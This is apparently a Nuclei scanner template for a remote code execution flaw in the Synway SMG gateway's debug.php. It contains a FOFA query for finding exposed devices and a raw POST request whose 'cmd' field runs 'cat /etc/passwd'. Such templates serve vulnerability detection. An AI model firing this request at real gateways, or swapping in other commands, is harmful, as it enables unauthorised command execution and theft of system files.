id: sanhui-smg-debug-rce

info:
  name: Synway SMG Gateway debug.php - Remote Code Execution
  author: yichen
  severity: critical
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="text ml10 mr20" && title="网关管理软件"
  tags: sanhui-smg,rce,gateway,intrusive

http:
- raw:
  - |
    @timeout: 30s
    POST /debug.php HTTP/1.1
    Host: {{Hostname}}
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    Content-Length: 333

    ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
    Content-Disposition: form-data; name="comdtype"

    1
    ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
    Content-Disposition: form-data; name="cmd"

    cat /etc/passwd
    ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
    Content-Disposition: form-data; name="run"

    ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb--

  matchers:
    - type: dsl
      dsl:
        - contains(body,"root") && status_code == 200